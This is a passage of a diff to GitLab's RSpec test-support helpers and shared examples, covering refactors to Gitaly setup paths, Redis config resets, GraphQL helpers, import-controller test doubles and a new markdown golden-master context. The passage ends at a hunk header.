@@ -14,7 +14,6 @@ module Spec wait_for_requests click_button name choose_options(role, expires_at) - choose_area_of_focus if area_of_focus click_button 'Invite' @@ -44,13 +43,6 @@ module Spec fill_in 'YYYY-MM-DD', with: expires_at.strftime('%Y-%m-%d') if expires_at end - - def choose_area_of_focus - page.within '[data-testid="area-of-focus-checks"]' do - check 'Contribute to the codebase' - check 'Collaborate on open issues and merge requests' - end - end end end end diff --git a/spec/support/helpers/gitaly_setup.rb b/spec/support/helpers/gitaly_setup.rb index 8a329c2f9dd..923051a2e04 100644 --- a/spec/support/helpers/gitaly_setup.rb +++ b/spec/support/helpers/gitaly_setup.rb @@ -18,8 +18,12 @@ module GitalySetup Logger.new($stdout, level: level, formatter: ->(_, _, _, msg) { msg }) end + def expand_path(path) + File.expand_path(path, File.join(__dir__, '../../..')) + end + def tmp_tests_gitaly_dir - File.expand_path('../../../tmp/tests/gitaly', __dir__) + expand_path('tmp/tests/gitaly') end def tmp_tests_gitaly_bin_dir @@ -27,11 +31,11 @@ module GitalySetup end def tmp_tests_gitlab_shell_dir - File.expand_path('../../../tmp/tests/gitlab-shell', __dir__) + expand_path('tmp/tests/gitlab-shell') end def rails_gitlab_shell_secret - File.expand_path('../../../.gitlab_shell_secret', __dir__) + expand_path('.gitlab_shell_secret') end def gemfile @@ -48,7 +52,7 @@ module GitalySetup def env { - 'HOME' => File.expand_path('tmp/tests'), + 'HOME' => expand_path('tmp/tests'), 'GEM_PATH' => Gem.path.join(':'), 'BUNDLE_APP_CONFIG' => File.join(gemfile_dir, '.bundle'), 'BUNDLE_INSTALL_FLAGS' => nil, @@ -67,7 +71,7 @@ module GitalySetup system('bundle config set --local retry 3', chdir: gemfile_dir) if ENV['CI'] - bundle_path = File.expand_path('../../../vendor/gitaly-ruby', __dir__) + bundle_path = expand_path('vendor/gitaly-ruby') system('bundle', 'config', 'set', '--local', 'path', bundle_path, chdir: gemfile_dir) end end @@ -154,7 +158,7 @@ module GitalySetup LOGGER.debug "Checking gitaly-ruby bundle...\n" out = ENV['CI'] ? $stdout : '/dev/null' - abort 'bundle check failed' unless system(env, 'bundle', 'check', out: out, chdir: File.dirname(gemfile)) + abort 'bundle check failed' unless system(env, 'bundle', 'check', out: out, chdir: gemfile_dir) end def read_socket_path(service) diff --git a/spec/support/helpers/gpg_helpers.rb b/spec/support/helpers/gpg_helpers.rb index 81e669aab57..7e78fd86de3 100644 --- a/spec/support/helpers/gpg_helpers.rb +++ b/spec/support/helpers/gpg_helpers.rb @@ -138,7 +138,7 @@ module GpgHelpers end def primary_keyid - fingerprint[-16..-1] + fingerprint[-16..] end def fingerprint @@ -281,7 +281,7 @@ module GpgHelpers end def primary_keyid2 - fingerprint2[-16..-1] + fingerprint2[-16..] end def fingerprint2 @@ -374,7 +374,7 @@ module GpgHelpers end def primary_keyid - fingerprint[-16..-1] + fingerprint[-16..] end def fingerprint @@ -776,7 +776,7 @@ module GpgHelpers end def primary_keyid - fingerprint[-16..-1] + fingerprint[-16..] end def fingerprint diff --git a/spec/support/helpers/graphql_helpers.rb b/spec/support/helpers/graphql_helpers.rb index 1f0c9b658dc..8b7d1c753d5 100644 --- a/spec/support/helpers/graphql_helpers.rb +++ b/spec/support/helpers/graphql_helpers.rb @@ -515,8 +515,13 @@ module GraphqlHelpers # Allows for array indexing, like this # ['project', 'boards', 'edges', 0, 'node', 'lists'] keys.reduce(data) do |memo, key| - if memo.is_a?(Array) - key.is_a?(Integer) ? memo[key] : memo.flat_map { |e| Array.wrap(e[key]) } + if memo.is_a?(Array) && key.is_a?(Integer) + memo[key] + elsif memo.is_a?(Array) + memo.compact.flat_map do |e| + x = e[key] + x.nil? ? [x] : Array.wrap(x) + end else memo&.dig(key) end diff --git a/spec/support/helpers/javascript_fixtures_helpers.rb b/spec/support/helpers/javascript_fixtures_helpers.rb index fb909008f12..84cd0181533 100644 --- a/spec/support/helpers/javascript_fixtures_helpers.rb +++ b/spec/support/helpers/javascript_fixtures_helpers.rb @@ -13,6 +13,12 @@ module JavaScriptFixturesHelpers included do |base| base.around do |example| + # Don't actually run the example when we're only interested in the `test file -> JSON frontend fixture` mapping + if ENV['GENERATE_FRONTEND_FIXTURES_MAPPING'] == 'true' + $fixtures_mapping[example.metadata[:file_path].delete_prefix('./')] << File.join(fixture_root_path, example.description) # rubocop:disable Style/GlobalVars + next + end + # pick an arbitrary date from the past, so tests are not time dependent # Also see spec/frontend/__helpers__/fake_date/jest.js Timecop.freeze(Time.utc(2015, 7, 3, 10)) { example.run } diff --git a/spec/support/helpers/memory_usage_helper.rb b/spec/support/helpers/memory_usage_helper.rb index aa7b3bae83a..02d1935921f 100644 --- a/spec/support/helpers/memory_usage_helper.rb +++ b/spec/support/helpers/memory_usage_helper.rb @@ -23,7 +23,7 @@ module MemoryUsageHelper output, status = Gitlab::Popen.popen(%w(free -m)) abort "`free -m` return code is #{status}: #{output}" unless status == 0 - result = output.split("\n")[1].split(" ")[1..-1] + result = output.split("\n")[1].split(" ")[1..] attrs = %i(m_total m_used m_free m_shared m_buffers_cache m_available).freeze attrs.zip(result).to_h diff --git a/spec/support/helpers/migrations_helpers/work_item_types_helper.rb b/spec/support/helpers/migrations_helpers/work_item_types_helper.rb new file mode 100644 index 00000000000..59b1f1b1305 --- /dev/null +++ b/spec/support/helpers/migrations_helpers/work_item_types_helper.rb @@ -0,0 +1,27 @@ +# frozen_string_literal: true + +module MigrationHelpers + module WorkItemTypesHelper + DEFAULT_WORK_ITEM_TYPES = { + issue: { name: 'Issue', icon_name: 'issue-type-issue', enum_value: 0 }, + incident: { name: 'Incident', icon_name: 'issue-type-incident', enum_value: 1 }, + test_case: { name: 'Test Case', icon_name: 'issue-type-test-case', enum_value: 2 }, + requirement: { name: 'Requirement', icon_name: 'issue-type-requirements', enum_value: 3 }, + task: { name: 'Task', icon_name: 'issue-type-task', enum_value: 4 } + }.freeze + + def reset_work_item_types + work_item_types_table.delete_all + + DEFAULT_WORK_ITEM_TYPES.each do |type, attributes| + work_item_types_table.create!(base_type: attributes[:enum_value], **attributes.slice(:name, :icon_name)) + end + end + + private + + def work_item_types_table + table(:work_item_types) + end + end +end diff --git a/spec/support/helpers/modal_helpers.rb b/spec/support/helpers/modal_helpers.rb new file mode 100644 index 00000000000..a1f03cc0da5 --- /dev/null +++ b/spec/support/helpers/modal_helpers.rb @@ -0,0 +1,27 @@ +# frozen_string_literal: true + +module Spec + module Support + module Helpers + module ModalHelpers + def within_modal + page.within('[role="dialog"]') do + yield + end + end + + def accept_gl_confirm(text = nil, button_text: 'OK') + yield if block_given? + + within_modal do + unless text.nil? + expect(page).to have_content(text) + end + + click_button button_text + end + end + end + end + end +end diff --git a/spec/support/helpers/navbar_structure_helper.rb b/spec/support/helpers/navbar_structure_helper.rb index c2ec82155cd..6fa69cbd6ad 100644 --- a/spec/support/helpers/navbar_structure_helper.rb +++ b/spec/support/helpers/navbar_structure_helper.rb @@ -19,6 +19,17 @@ module NavbarStructureHelper hash[:nav_sub_items].insert(index + 1, new_sub_nav_item_name) end + def insert_before_sub_nav_item(after_sub_nav_item_name, within:, new_sub_nav_item_name:) + expect(structure).to include(a_hash_including(nav_item: within)) + hash = structure.find { |h| h[:nav_item] == within if h } + + expect(hash).to have_key(:nav_sub_items) + expect(hash[:nav_sub_items]).to include(after_sub_nav_item_name) + + index = hash[:nav_sub_items].find_index(after_sub_nav_item_name) + hash[:nav_sub_items].insert(index, new_sub_nav_item_name) + end + def insert_package_nav(within) insert_after_nav_item( within, diff --git a/spec/support/helpers/session_helpers.rb b/spec/support/helpers/session_helpers.rb index 4ef099a393e..236585296e5 100644 --- a/spec/support/helpers/session_helpers.rb +++ b/spec/support/helpers/session_helpers.rb @@ -17,10 +17,10 @@ module SessionHelpers end def get_session_keys - Gitlab::Redis::SharedState.with { |redis| redis.scan_each(match: 'session:gitlab:*').to_a } + Gitlab::Redis::Sessions.with { |redis| redis.scan_each(match: 'session:gitlab:*').to_a } end def get_ttl(key) - Gitlab::Redis::SharedState.with { |redis| redis.ttl(key) } + Gitlab::Redis::Sessions.with { |redis| redis.ttl(key) } end end diff --git a/spec/support/helpers/snowplow_helpers.rb b/spec/support/helpers/snowplow_helpers.rb index 553739b5d30..c8b194919ed 100644 --- a/spec/support/helpers/snowplow_helpers.rb +++ b/spec/support/helpers/snowplow_helpers.rb @@ -48,11 +48,15 @@ module SnowplowHelpers # ) def expect_snowplow_event(category:, action:, context: nil, **kwargs) if context - kwargs[:context] = [] - context.each do |c| - expect(SnowplowTracker::SelfDescribingJson).to have_received(:new) - .with(c[:schema], c[:data]).at_least(:once) - kwargs[:context] << an_instance_of(SnowplowTracker::SelfDescribingJson) + if context.is_a?(Array) + kwargs[:context] = [] + context.each do |c| + expect(SnowplowTracker::SelfDescribingJson).to have_received(:new) + .with(c[:schema], c[:data]).at_least(:once) + kwargs[:context] << an_instance_of(SnowplowTracker::SelfDescribingJson) + end + else + kwargs[:context] = context end end diff --git a/spec/support/helpers/stub_gitlab_calls.rb b/spec/support/helpers/stub_gitlab_calls.rb index ef3c39c83c2..ae031f58bd4 100644 --- a/spec/support/helpers/stub_gitlab_calls.rb +++ b/spec/support/helpers/stub_gitlab_calls.rb @@ -93,7 +93,7 @@ module StubGitlabCalls def stub_commonmark_sourcepos_disabled render_options = - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) Banzai::Filter::MarkdownEngines::CommonMark::RENDER_OPTIONS_C else Banzai::Filter::MarkdownEngines::CommonMark::RENDER_OPTIONS_RUBY diff --git a/spec/support/helpers/test_env.rb b/spec/support/helpers/test_env.rb index acbc15f7b62..d36bc4e3cb4 100644 --- a/spec/support/helpers/test_env.rb +++ b/spec/support/helpers/test_env.rb @@ -53,7 +53,7 @@ module TestEnv 'wip' => 'b9238ee', 'csv' => '3dd0896', 'v1.1.0' => 'b83d6e3', - 'add-ipython-files' => '2b5ef814', + 'add-ipython-files' => '532c837', 'add-pdf-file' => 'e774ebd', 'squash-large-files' => '54cec52', 'add-pdf-text-binary' => '79faa7b', @@ -594,6 +594,8 @@ module TestEnv # Not a git SHA, so return early return false unless expected_version =~ ::Gitlab::Git::COMMIT_ID + return false unless Dir.exist?(component_folder) + sha, exit_status = Gitlab::Popen.popen(%W(#{Gitlab.config.git.bin_path} rev-parse HEAD), component_folder) return false if exit_status != 0 diff --git a/spec/support/matchers/background_migrations_matchers.rb b/spec/support/matchers/background_migrations_matchers.rb index d3833a1e8e8..1057639beec 100644 --- a/spec/support/matchers/background_migrations_matchers.rb +++ b/spec/support/matchers/background_migrations_matchers.rb @@ -9,7 +9,7 @@ RSpec::Matchers.define :be_background_migration_with_arguments do |arguments| end RSpec::Matchers.define :be_scheduled_delayed_migration do |delay, *expected| - define_method :matches? do |migration| + match(notify_expectation_failures: true) do |migration| expect(migration).to be_background_migration_with_arguments(expected) BackgroundMigrationWorker.jobs.any? do |job| @@ -26,7 +26,7 @@ RSpec::Matchers.define :be_scheduled_delayed_migration do |delay, *expected| end RSpec::Matchers.define :be_scheduled_migration do |*expected| - define_method :matches? do |migration| + match(notify_expectation_failures: true) do |migration| expect(migration).to be_background_migration_with_arguments(expected) BackgroundMigrationWorker.jobs.any? do |job| @@ -41,7 +41,7 @@ RSpec::Matchers.define :be_scheduled_migration do |*expected| end RSpec::Matchers.define :be_scheduled_migration_with_multiple_args do |*expected| - define_method :matches? do |migration| + match(notify_expectation_failures: true) do |migration| expect(migration).to be_background_migration_with_arguments(expected) BackgroundMigrationWorker.jobs.any? do |job| diff --git a/spec/support/redis/redis_helpers.rb b/spec/support/redis/redis_helpers.rb index f27d873eb31..90c15dea1f8 100644 --- a/spec/support/redis/redis_helpers.rb +++ b/spec/support/redis/redis_helpers.rb @@ -32,4 +32,11 @@ module RedisHelpers def redis_sessions_cleanup! Gitlab::Redis::Sessions.with(&:flushdb) end + + # Usage: reset cached instance config + def redis_clear_raw_config!(instance_class) + instance_class.remove_instance_variable(:@_raw_config) + rescue NameError + # raised if @_raw_config was not set; ignore + end end diff --git a/spec/support/redis/redis_new_instance_shared_examples.rb b/spec/support/redis/redis_new_instance_shared_examples.rb index e9b1e3e4da1..943fe0f11ba 100644 --- a/spec/support/redis/redis_new_instance_shared_examples.rb +++ b/spec/support/redis/redis_new_instance_shared_examples.rb @@ -8,10 +8,16 @@ RSpec.shared_examples "redis_new_instance_shared_examples" do |name, fallback_cl let(:fallback_config_file) { nil } before do + redis_clear_raw_config!(fallback_class) + allow(fallback_class).to receive(:config_file_name).and_return(fallback_config_file) end - include_examples "redis_shared_examples" + after do + redis_clear_raw_config!(fallback_class) + end + + it_behaves_like "redis_shared_examples" describe '.config_file_name' do subject { described_class.config_file_name } diff --git a/spec/support/redis/redis_shared_examples.rb b/spec/support/redis/redis_shared_examples.rb index 72b3a72f9d4..d4c8682ec71 100644 --- a/spec/support/redis/redis_shared_examples.rb +++ b/spec/support/redis/redis_shared_examples.rb @@ -20,11 +20,11 @@ RSpec.shared_examples "redis_shared_examples" do before do allow(described_class).to receive(:config_file_name).and_return(Rails.root.join(config_file_name).to_s) - clear_raw_config + redis_clear_raw_config!(described_class) end after do - clear_raw_config + redis_clear_raw_config!(described_class) end describe '.config_file_name' do @@ -93,18 +93,23 @@ RSpec.shared_examples "redis_shared_examples" do subject { described_class.new(rails_env).store } shared_examples 'redis store' do + let(:redis_store) { ::Redis::Store } + let(:redis_store_to_s) { "Redis Client connected to #{host} against DB #{redis_database}" } + it 'instantiates Redis::Store' do - is_expected.to be_a(::Redis::Store) - expect(subject.to_s).to eq("Redis Client connected to #{host} against DB #{redis_database}") + is_expected.to be_a(redis_store) + + expect(subject.to_s).to eq(redis_store_to_s) end context 'with the namespace' do let(:namespace) { 'namespace_name' } + let(:redis_store_to_s) { "Redis Client connected to #{host} against DB #{redis_database} with namespace #{namespace}" } subject { described_class.new(rails_env).store(namespace: namespace) } it "uses specified namespace" do - expect(subject.to_s).to eq("Redis Client connected to #{host} against DB #{redis_database} with namespace #{namespace}") + expect(subject.to_s).to eq(redis_store_to_s) end end end @@ -394,12 +399,6 @@ RSpec.shared_examples "redis_shared_examples" do end end - def clear_raw_config - described_class.remove_instance_variable(:@_raw_config) - rescue NameError - # raised if @_raw_config was not set; ignore - end - def clear_pool described_class.remove_instance_variable(:@pool) rescue NameError diff --git a/spec/support/rspec.rb b/spec/support/rspec.rb index 00b9aac7bf4..b4a25fd121d 100644 --- a/spec/support/rspec.rb +++ b/spec/support/rspec.rb @@ -15,7 +15,10 @@ require 'rubocop' require 'rubocop/rspec/support' RSpec.configure do |config| - config.mock_with :rspec + config.mock_with :rspec do |mocks| + mocks.verify_doubled_constant_names = true + end + config.raise_errors_for_deprecations! config.include StubConfiguration diff --git a/spec/support/shared_contexts/features/integrations/project_integrations_shared_context.rb b/spec/support/shared_contexts/features/integrations/project_integrations_shared_context.rb index 07012914a4d..6414a4d1eb3 100644 --- a/spec/support/shared_contexts/features/integrations/project_integrations_shared_context.rb +++ b/spec/support/shared_contexts/features/integrations/project_integrations_shared_context.rb @@ -28,7 +28,7 @@ RSpec.shared_context 'project service activation' do end def click_test_integration - click_link('Test settings') + click_button('Test settings') end def click_test_then_save_integration(expect_test_to_fail: true) diff --git a/spec/support/shared_contexts/markdown_golden_master_shared_examples.rb b/spec/support/shared_contexts/markdown_golden_master_shared_examples.rb new file mode 100644 index 00000000000..d0915bbf158 --- /dev/null +++ b/spec/support/shared_contexts/markdown_golden_master_shared_examples.rb @@ -0,0 +1,127 @@ +# frozen_string_literal: true + +require 'spec_helper' + +# See spec/fixtures/markdown/markdown_golden_master_examples.yml for documentation on how this spec works. +RSpec.shared_context 'API::Markdown Golden Master shared context' do |markdown_yml_file_path| + include ApiHelpers + include WikiHelpers + + let_it_be(:user) { create(:user, username: 'gfm_user') } + + let_it_be(:group) { create(:group, :public) } + let_it_be(:project) { create(:project, :public, :repository, group: group) } + + let_it_be(:label) { create(:label, project: project, title: 'bug') } + let_it_be(:milestone) { create(:milestone, project: project, title: '1.1') } + let_it_be(:issue) { create(:issue, project: project) } + let_it_be(:merge_request) { create(:merge_request, source_project: project) } + + let_it_be(:project_wiki) { create(:project_wiki, project: project, user: user) } + + let_it_be(:project_wiki_page) { create(:wiki_page, wiki: project_wiki) } + + before(:all) do + group.add_owner(user) + project.add_maintainer(user) + end + + before do + sign_in(user) + end + + markdown_examples = begin + yaml = File.read(markdown_yml_file_path) + YAML.safe_load(yaml, symbolize_names: true, aliases: true) + end + + it "examples must be unique and alphabetized by name", :unlimited_max_formatted_output_length do + names = markdown_examples.map { |example| example[:name] } + expect(names).to eq(names.sort.uniq) + end + + if focused_markdown_examples_string = ENV['FOCUSED_MARKDOWN_EXAMPLES'] + focused_markdown_examples = focused_markdown_examples_string.split(',').map(&:strip) || [] + markdown_examples.reject! {|markdown_example| !focused_markdown_examples.include?(markdown_example.fetch(:name)) } + end + + markdown_examples.each do |markdown_example| + name = markdown_example.fetch(:name) + api_context = markdown_example[:api_context] + + if api_context && !name.end_with?("_for_#{api_context}") + raise "Name must have suffix of '_for_#{api_context}' to the api_context" + end + + context "for #{name}#{api_context ? " (api_context: #{api_context})" : ''}" do + let(:pending_reason) do + pending_value = markdown_example.fetch(:pending, nil) + get_pending_reason(pending_value) + end + + let(:example_markdown) { markdown_example.fetch(:markdown) } + let(:example_html) { markdown_example.fetch(:html) } + let(:substitutions) { markdown_example.fetch(:substitutions, {}) } + + it "verifies conversion of GFM to HTML", :unlimited_max_formatted_output_length do + pending pending_reason if pending_reason + + normalized_example_html = normalize_html(example_html, substitutions) + + api_url = get_url_for_api_context(api_context) + + post api_url, params: { text: example_markdown, gfm: true } + expect(response).to be_successful + response_body = Gitlab::Json.parse(response.body) + # Some requests have the HTML in the `html` key, others in the `body` key. + response_html = response_body['body'] ? response_body.fetch('body') : response_body.fetch('html') + normalized_response_html = normalize_html(response_html, substitutions) + + expect(normalized_response_html).to eq(normalized_example_html) + end + + def get_pending_reason(pending_value) + return false unless pending_value + + return pending_value if pending_value.is_a?(String) + + pending_value[:backend] || false + end + + def normalize_html(html, substitutions) + normalized_html = html.dup + # Note: having the top level `substitutions` data structure be a hash of arrays + # allows us to compose multiple substitutions via YAML anchors (YAML anchors + # pointing to arrays can't be combined) + substitutions.each_value do |substitution_entry| + substitution_entry.each do |substitution| + regex = substitution.fetch(:regex) + replacement = substitution.fetch(:replacement) + normalized_html.gsub!(%r{#{regex}}, replacement) + end + end + + normalized_html + end + end + end + + def supported_api_contexts + %w(project group project_wiki) + end + + def get_url_for_api_context(api_context) + case api_context + when 'project' + "/#{project.full_path}/preview_markdown" + when 'group' + "/groups/#{group.full_path}/preview_markdown" + when 'project_wiki' + "/#{project.full_path}/-/wikis/#{project_wiki_page.slug}/preview_markdown" + when nil + api "/markdown" + else + raise "Error: 'context' extension was '#{api_context}'. It must be one of: #{supported_api_contexts.join(',')}" + end + end +end diff --git a/spec/support/shared_contexts/navbar_structure_context.rb b/spec/support/shared_contexts/navbar_structure_context.rb index bcc6abdc308..085f1f13c2c 100644 --- a/spec/support/shared_contexts/navbar_structure_context.rb +++ b/spec/support/shared_contexts/navbar_structure_context.rb @@ -5,7 +5,7 @@ RSpec.shared_context 'project navbar structure' do { nav_item: _('Security & Compliance'), nav_sub_items: [ - (_('Audit Events') if Gitlab.ee?), + (_('Audit events') if Gitlab.ee?), _('Configuration') ] } @@ -94,11 +94,11 @@ RSpec.shared_context 'project navbar structure' do { nav_item: _('Analytics'), nav_sub_items: [ + _('Value stream'), _('CI/CD'), (_('Code review') if Gitlab.ee?), (_('Merge request') if Gitlab.ee?), - _('Repository'), - _('Value stream') + _('Repository') ] }, { @@ -165,7 +165,7 @@ RSpec.shared_context 'group navbar structure' do { nav_item: _('Security & Compliance'), nav_sub_items: [ - _('Audit Events') + _('Audit events') ] } end @@ -190,7 +190,8 @@ RSpec.shared_context 'group navbar structure' do [ _('List'), _('Board'), - _('Milestones') + _('Milestones'), + (_('Iterations') if Gitlab.ee?) ] end diff --git a/spec/support/shared_contexts/policies/group_policy_shared_context.rb b/spec/support/shared_contexts/policies/group_policy_shared_context.rb index b432aa24bb8..ad6462dc367 100644 --- a/spec/support/shared_contexts/policies/group_policy_shared_context.rb +++ b/spec/support/shared_contexts/policies/group_policy_shared_context.rb @@ -48,6 +48,7 @@ RSpec.shared_context 'GroupPolicy context' do destroy_package create_projects read_cluster create_cluster update_cluster admin_cluster add_cluster + admin_group_runners ] end diff --git a/spec/support/shared_examples/bulk_imports/common/pipelines/wiki_pipeline_examples.rb b/spec/support/shared_examples/bulk_imports/common/pipelines/wiki_pipeline_examples.rb index e8cc666605b..06800f7cded 100644 --- a/spec/support/shared_examples/bulk_imports/common/pipelines/wiki_pipeline_examples.rb +++ b/spec/support/shared_examples/bulk_imports/common/pipelines/wiki_pipeline_examples.rb @@ -9,16 +9,18 @@ RSpec.shared_examples 'wiki pipeline imports a wiki for an entity' do let(:extracted_data) { BulkImports::Pipeline::ExtractedData.new(data: {}) } - context 'successfully imports wiki for an entity' do - subject { described_class.new(context) } + subject { described_class.new(context) } - before do - allow_next_instance_of(BulkImports::Common::Extractors::GraphqlExtractor) do |extractor| - allow(extractor).to receive(:extract).and_return(extracted_data) - end + before do + allow_next_instance_of(BulkImports::Common::Extractors::GraphqlExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(extracted_data) end + end + context 'when wiki exists' do it 'imports new wiki into destination project' do + expect(subject).to receive(:source_wiki_exists?).and_return(true) + expect_next_instance_of(Gitlab::GitalyClient::RepositoryService) do |repository_service| url = "https://oauth2:token@gitlab.example/#{entity.source_full_path}.wiki.git" expect(repository_service).to receive(:fetch_remote).with(url, any_args).and_return 0 @@ -27,5 +29,16 @@ RSpec.shared_examples 'wiki pipeline imports a wiki for an entity' do subject.run end end + + context 'when wiki does not exist' do + it 'does not import wiki' do + expect(subject).to receive(:source_wiki_exists?).and_return(false) + + expect(parent.wiki).not_to receive(:ensure_repository) + expect(parent.wiki.repository).not_to receive(:ensure_repository) + + expect { subject.run }.not_to raise_error + end + end end end diff --git a/spec/support/shared_examples/ci/create_pipeline_service_shared_examples.rb b/spec/support/shared_examples/ci/create_pipeline_service_shared_examples.rb new file mode 100644 index 00000000000..a72ce320e90 --- /dev/null +++ b/spec/support/shared_examples/ci/create_pipeline_service_shared_examples.rb @@ -0,0 +1,27 @@ +# frozen_string_literal: true + +RSpec.shared_examples 'pipelines are created without N+1 SQL queries' do + before do + # warm up + stub_ci_pipeline_yaml_file(config1) + execute_service + end + + it 'avoids N+1 queries', :aggregate_failures, :request_store, :use_sql_query_cache do + control = ActiveRecord::QueryRecorder.new(skip_cached: false) do + stub_ci_pipeline_yaml_file(config1) + + pipeline = execute_service.payload + + expect(pipeline).to be_created_successfully + end + + expect do + stub_ci_pipeline_yaml_file(config2) + + pipeline = execute_service.payload + + expect(pipeline).to be_created_successfully + end.not_to exceed_all_query_limit(control).with_threshold(accepted_n_plus_ones) + end +end diff --git a/spec/support/shared_examples/controllers/githubish_import_controller_shared_examples.rb b/spec/support/shared_examples/controllers/githubish_import_controller_shared_examples.rb index 0ffa32dec9e..46fc2cbdc9b 100644 --- a/spec/support/shared_examples/controllers/githubish_import_controller_shared_examples.rb +++ b/spec/support/shared_examples/controllers/githubish_import_controller_shared_examples.rb @@ -58,11 +58,12 @@ RSpec.shared_examples 'a GitHub-ish import controller: GET new' do end RSpec.shared_examples 'a GitHub-ish import controller: GET status' do + let(:repo_fake) { Struct.new(:id, :login, :full_name, :name, :owner, keyword_init: true) } let(:new_import_url) { public_send("new_import_#{provider}_url") } let(:user) { create(:user) } - let(:repo) { OpenStruct.new(login: 'vim', full_name: 'asd/vim', name: 'vim', owner: { login: 'owner' }) } - let(:org) { OpenStruct.new(login: 'company') } - let(:org_repo) { OpenStruct.new(login: 'company', full_name: 'company/repo', name: 'repo', owner: { login: 'owner' }) } + let(:repo) { repo_fake.new(login: 'vim', full_name: 'asd/vim', name: 'vim', owner: { login: 'owner' }) } + let(:org) { double('org', login: 'company') } + let(:org_repo) { repo_fake.new(login: 'company', full_name: 'company/repo', name: 'repo', owner: { login: 'owner' }) } before do assign_session_token(provider) @@ -72,7 +73,7 @@ RSpec.shared_examples 'a GitHub-ish import controller: GET status' do project = create(:project, import_type: provider, namespace: user.namespace, import_status: :finished, import_source: 'example/repo') group = create(:group) group.add_owner(user) - stub_client(repos: [repo, org_repo], orgs: [org], org_repos: [org_repo], each_page: [OpenStruct.new(objects: [repo, org_repo])].to_enum) + stub_client(repos: [repo, org_repo], orgs: [org], org_repos: [org_repo], each_page: [double('client', objects: [repo, org_repo])].to_enum) get :status, format: :json @@ -125,7 +126,7 @@ RSpec.shared_examples 'a GitHub-ish import controller: GET status' do end context 'when filtering' do - let(:repo_2) { OpenStruct.new(login: 'emacs', full_name: 'asd/emacs', name: 'emacs', owner: { login: 'owner' }) } + let(:repo_2) { repo_fake.new(login: 'emacs', full_name: 'asd/emacs', name: 'emacs', owner: { login: 'owner' }) } let(:project) { create(:project, import_type: provider, namespace: user.namespace, import_status: :finished, import_source: 'example/repo') } let(:group) { create(:group) } let(:repos) { [repo, repo_2, org_repo] } @@ -133,7 +134,7 @@ RSpec.shared_examples 'a GitHub-ish import controller: GET status' do before do group.add_owner(user) client = stub_client(repos: repos, orgs: [org], org_repos: [org_repo]) - allow(client).to receive(:each_page).and_return([OpenStruct.new(objects: repos)].to_enum) + allow(client).to receive(:each_page).and_return([double('client', objects: repos)].to_enum) # GitHub controller has filtering done using GitHub Search API stub_feature_flags(remove_legacy_github_client: false) end @@ -172,7 +173,7 @@ RSpec.shared_examples 'a GitHub-ish import controller: GET status' do repos = [build(:project, name: 2, path: 'test')] client = stub_client(repos: repos) - allow(client).to receive(:each_page).and_return([OpenStruct.new(objects: repos)].to_enum) + allow(client).to receive(:each_page).and_return([double('client', objects: repos)].to_enum) end it 'does not raise an error' do @@ -189,13 +190,14 @@ end RSpec.shared_examples 'a GitHub-ish import controller: POST create' do let(:user) { create(:user) } let(:provider_username) { user.username } - let(:provider_user) { OpenStruct.new(login: provider_username) } + let(:provider_user) { double('user', login: provider_username) } let(:project) { create(:project, import_type: provider, import_status: :finished, import_source: "#{provider_username}/vim") } let(:provider_repo) do - OpenStruct.new( + double( + 'provider', name: 'vim', full_name: "#{provider_username}/vim", - owner: OpenStruct.new(login: provider_username) + owner: double('owner', login: provider_username) ) end @@ -265,10 +267,9 @@ RSpec.shared_examples 'a GitHub-ish import controller: POST create' do end context "when the repository owner is not the provider user" do - let(:other_username) { "someone_else" } + let(:provider_username) { "someone_else" } before do - provider_repo.owner = OpenStruct.new(login: other_username) assign_session_token(provider) end @@ -277,8 +278,7 @@ RSpec.shared_examples 'a GitHub-ish import controller: POST create' do context "when the namespace is owned by the GitLab user" do before do - user.username = other_username - user.save! + user.update!(username: provider_username) end it "takes the existing namespace" do @@ -292,7 +292,7 @@ RSpec.shared_examples 'a GitHub-ish import controller: POST create' do context "when the namespace is not owned by the GitLab user" do it "creates a project using user's namespace" do - create(:user, username: other_username) + create(:user, username: provider_username) expect(Gitlab::LegacyGithubImport::ProjectCreator) .to receive(:new).with(provider_repo, provider_repo.name, user.namespace, user, type: provider, **access_params) diff --git a/spec/support/shared_examples/controllers/repositories/git_http_controller_shared_examples.rb b/spec/support/shared_examples/controllers/repositories/git_http_controller_shared_examples.rb index 00a0fb7e4c5..3a7588a5cc9 100644 --- a/spec/support/shared_examples/controllers/repositories/git_http_controller_shared_examples.rb +++ b/spec/support/shared_examples/controllers/repositories/git_http_controller_shared_examples.rb @@ -50,7 +50,8 @@ RSpec.shared_examples Repositories::GitHttpController do context 'with authorized user' do before do - request.headers.merge! auth_env(user.username, user.password, nil) + password = user.try(:password) || user.try(:token) + request.headers.merge! auth_env(user.username, password, nil) end it 'returns 200' do @@ -71,9 +72,10 @@ RSpec.shared_examples Repositories::GitHttpController do it 'adds user info to the logs' do get :info_refs, params: params - expect(log_data).to include('username' => user.username, - 'user_id' => user.id, - 'meta.user' => user.username) + user_log_data = { 'username' => user.username, 'user_id' => user.id } + user_log_data['meta.user'] = user.username if user.is_a?(User) + + expect(log_data).to include(user_log_data) end end end diff --git a/spec/support/shared_examples/controllers/unique_visits_shared_examples.rb b/spec/support/shared_examples/controllers/unique_visits_shared_examples.rb index 30914e61df0..ac7680f7ddb 100644 --- a/spec/support/shared_examples/controllers/unique_visits_shared_examples.rb +++ b/spec/support/shared_examples/controllers/unique_visits_shared_examples.rb @@ -6,15 +6,23 @@ RSpec.shared_examples 'tracking unique visits' do |method| let(:request_params) { {} } it 'tracks unique visit if the format is HTML' do - expect(Gitlab::UsageDataCounters::HLLRedisCounter) - .to receive(:track_event).with(target_id, values: kind_of(String)) + ids = target_id.instance_of?(String) ? [target_id] : target_id + + ids.each do |id| + expect(Gitlab::UsageDataCounters::HLLRedisCounter) + .to receive(:track_event).with(id, values: kind_of(String)) + end get method, params: request_params, format: :html end it 'tracks unique visit if DNT is not enabled' do - expect(Gitlab::UsageDataCounters::HLLRedisCounter) - .to receive(:track_event).with(target_id, values: kind_of(String)) + ids = target_id.instance_of?(String) ? [target_id] : target_id + + ids.each do |id| + expect(Gitlab::UsageDataCounters::HLLRedisCounter) + .to receive(:track_event).with(id, values: kind_of(String)) + end stub_do_not_track('0') diff --git a/spec/support/shared_examples/controllers/wiki_actions_shared_examples.rb b/spec/support/shared_examples/controllers/wiki_actions_shared_examples.rb index 30710e43357..1cb52c07069 100644 --- a/spec/support/shared_examples/controllers/wiki_actions_shared_examples.rb +++ b/spec/support/shared_examples/controllers/wiki_actions_shared_examples.rb @@ -299,7 +299,7 @@ 